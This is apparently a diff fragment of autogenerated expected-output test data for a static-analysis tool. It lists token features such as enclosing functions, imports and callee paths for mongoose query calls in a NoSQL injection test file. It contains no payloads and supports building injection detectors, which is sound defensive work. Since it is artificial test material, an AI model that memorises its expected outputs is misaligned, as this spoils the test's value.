autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:35 | Mongoos ... ).model | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:38 | Mongoos ... odel(Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:38 | Mongoos ... odel(Y) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:38 | Mongoos ... odel(Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:38 | Mongoos ... odel(Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:38 | exceptional return of Mongoos ... odel(Y) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:38 | exceptional return of Mongoos ... odel(Y) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:38 | exceptional return of Mongoos ... odel(Y) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:38 | exceptional return of Mongoos ... odel(Y) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:44 | Mongoos ... ).count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:44 | Mongoos ... ).count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:44 | Mongoos ... ).count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:44 | Mongoos ... ).count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:51 | Mongoos ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:51 | Mongoos ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:51 | Mongoos ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:51 | Mongoos ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:51 | exceptional return of Mongoos ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:51 | exceptional return of Mongoos ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:51 | exceptional return of Mongoos ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:2:82:51 | exceptional return of Mongoos ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:11:82:26 | createConnection | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:11:82:26 | createConnection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:11:82:26 | createConnection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:11:82:26 | createConnection | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:28:82:28 | X | CalleeFlexibleAccessPath | Mongoose.createConnection | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:28:82:28 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:28:82:28 | X | calleeImports | mongoose | @@ -2498,6 +12781,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:28:82:28 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:28:82:28 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:28:82:28 | X | receiverName | Mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:31:82:35 | model | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:31:82:35 | model | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:31:82:35 | model | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:31:82:35 | model | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:37:82:37 | Y | CalleeFlexibleAccessPath | Mongoose.createConnection().model | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:37:82:37 | Y | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:37:82:37 | Y | calleeImports | mongoose | @@ -2505,6 +12792,10 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:37:82:37 | Y | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:37:82:37 | Y | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:37:82:37 | Y | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:40:82:44 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:40:82:44 | count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:40:82:44 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:40:82:44 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:46:82:50 | query | CalleeFlexibleAccessPath | Mongoose.createConnection().model().count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:46:82:50 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:46:82:50 | query | calleeImports | mongoose | @@ -2512,6 +12803,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:46:82:50 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:46:82:50 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:82:46:82:50 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:9 | Mongoose | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:9 | Mongoose | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:9 | Mongoose | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:9 | Mongoose | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:26 | Mongoos ... nection | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:26 | Mongoos ... nection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:26 | Mongoos ... nection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:26 | Mongoos ... nection | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:29 | Mongoos ... tion(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:29 | Mongoos ... tion(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:29 | Mongoos ... tion(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:29 | Mongoos ... tion(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:29 | exceptional return of Mongoos ... tion(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:29 | exceptional return of Mongoos ... tion(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:29 | exceptional return of Mongoos ... tion(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:29 | exceptional return of Mongoos ... tion(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:36 | Mongoos ... .models | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:36 | Mongoos ... .models | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:36 | Mongoos ... .models | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:36 | Mongoos ... .models | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:39 | Mongoos ... dels[Y] | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:39 | Mongoos ... dels[Y] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:39 | Mongoos ... dels[Y] | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:39 | Mongoos ... dels[Y] | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:45 | Mongoos ... ].count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:45 | Mongoos ... ].count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:45 | Mongoos ... ].count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:45 | Mongoos ... ].count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:52 | Mongoos ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:52 | Mongoos ... (query) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:52 | Mongoos ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:52 | Mongoos ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:52 | exceptional return of Mongoos ... (query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:52 | exceptional return of Mongoos ... (query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:52 | exceptional return of Mongoos ... (query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:2:83:52 | exceptional return of Mongoos ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:11:83:26 | createConnection | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:11:83:26 | createConnection | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:11:83:26 | createConnection | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:11:83:26 | createConnection | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:28:83:28 | X | CalleeFlexibleAccessPath | Mongoose.createConnection | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:28:83:28 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:28:83:28 | X | calleeImports | mongoose | @@ -2520,6 +12851,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:28:83:28 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:28:83:28 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:28:83:28 | X | receiverName | Mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:31:83:36 | models | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:31:83:36 | models | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:31:83:36 | models | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:31:83:36 | models | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:38:83:38 | Y | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:38:83:38 | Y | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:38:83:38 | Y | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:38:83:38 | Y | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:41:83:45 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:41:83:45 | count | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:41:83:45 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:41:83:45 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:47:83:51 | query | CalleeFlexibleAccessPath | Mongoose.createConnection().models.?.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:47:83:51 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:47:83:51 | query | calleeImports | mongoose | @@ -2527,6 +12870,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:47:83:51 | query | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:47:83:51 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:83:47:83:51 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:17 | Document.findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:17 | Document.findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:17 | Document.findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:17 | Document.findOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:52 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:52 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:52 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:52 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:52 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:52 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:52 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:2:85:52 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:11:85:17 | findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:11:85:17 | findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:11:85:17 | findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:11:85:17 | findOne | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:19:85:19 | X | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:19:85:19 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:19:85:19 | X | calleeImports | mongoose | @@ -2535,6 +12898,14 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:19:85:19 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:19:85:19 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:19:85:19 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:21 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:21 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:21 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:21 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | (err, r ... (query) | CalleeFlexibleAccessPath | Document.findOne | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | (err, r ... (query) | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | (err, r ... (query) | calleeImports | mongoose | @@ -2543,6 +12914,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | (err, r ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | (err, r ... (query) | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | (err, r ... (query) | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:22:85:51 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:23:85:25 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:23:85:25 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:23:85:25 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:23:85:25 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:28:85:30 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:28:85:30 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:28:85:30 | res | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:28:85:30 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:28:85:30 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:28:85:30 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:28:85:30 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:28:85:30 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:38 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:38 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:38 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:38 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:44 | res.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:44 | res.count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:44 | res.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:44 | res.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:51 | exceptional return of res.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:51 | exceptional return of res.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:51 | exceptional return of res.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:51 | exceptional return of res.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:51 | res.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:51 | res.count(query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:51 | res.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:36:85:51 | res.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:40:85:44 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:40:85:44 | count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:40:85:44 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:40:85:44 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:46:85:50 | query | CalleeFlexibleAccessPath | res.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:46:85:50 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:46:85:50 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2550,6 +12961,26 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:46:85:50 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:46:85:50 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:85:46:85:50 | query | receiverName | res | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:17 | Document.findOne | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:17 | Document.findOne | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:17 | Document.findOne | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:17 | Document.findOne | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:52 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:52 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:52 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:86:2:86:52 | Documen ... query)) | fileImports | body-parser express mongoose | +| 